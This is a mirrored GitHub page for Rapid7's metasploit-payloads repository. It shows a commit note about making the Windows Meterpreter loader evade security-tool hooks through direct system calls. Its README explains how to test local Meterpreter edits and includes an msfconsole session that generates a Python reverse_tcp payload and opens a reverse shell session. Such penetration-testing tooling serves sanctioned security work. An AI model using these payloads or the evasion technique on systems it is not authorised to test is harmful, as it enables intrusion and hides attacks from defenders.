mirror of
https://github.com/rapid7/metasploit-payloads
synced 2024-12-02 20:36:40 +01:00
1adafcd2fb
This updates the RDI loader used by the Windows Meterpreter to use direct system calls to prevent questionable behavior from being identified through hooks implemented by external applications. |
||
|---|---|---|
| .github | ||
| c/meterpreter | ||
| docker | ||
| gem | ||
| java | ||
| php/meterpreter | ||
| powershell | ||
| python/meterpreter | ||
| .gitignore | ||
| .gitmodules | ||
| appveyor.yml | ||
| COPYING | ||
| cortex.yaml | ||
| LICENSE | ||
| Makefile | ||
| README.md | ||
metasploit-payloads
Appveyor build status:
This is a unified repository for different Metasploit Framework payloads, which merges these repositories:
An alternate cross-platform C Meterpreter, called Mettle, is developed at https://github.com/rapid7/mettle
See the individual directories for meterpreter-specific README, build instructions and license details:
For Python and PHP Meterpreter, you can test changes to these files by symlinking the associated files to ~/.msf4/payloads/meterpreter.
As an example, here is how this might look like for a Python Meterpreter edit:
mkdir ~/.msf4/payloads # If this doesn't exist already
cd ~/git/metasploit-payloads
ln -s /home/gwillcox/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py
file ~/.msf4/payloads/meterpreter/ext_server_stdapi.py
/home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py: symbolic link to /home/gwillcox/git/metasploit-payloads/python/meterpreter/ext_server_stdapi.py
If things went right you should see a warning message when selecting one of the corresponding Meterpreter payloads and recieving a session:
msf6 > use payload/python/meterpreter/reverse_tcp
msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.153.128
LHOST => 192.168.153.128
msf6 payload(python/meterpreter/reverse_tcp) > generate -f raw -o reverse.py
[*] Writing 436 bytes to reverse.py...
msf6 payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
[*] Started reverse TCP handler on 192.168.153.128:4444
msf6 payload(python/meterpreter/reverse_tcp) > WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/meterpreter.py is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (24380 bytes) to 192.168.153.1
WARNING: Local file /home/gwillcox/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.1:50334) at 2022-12-13 12:49:49 -0600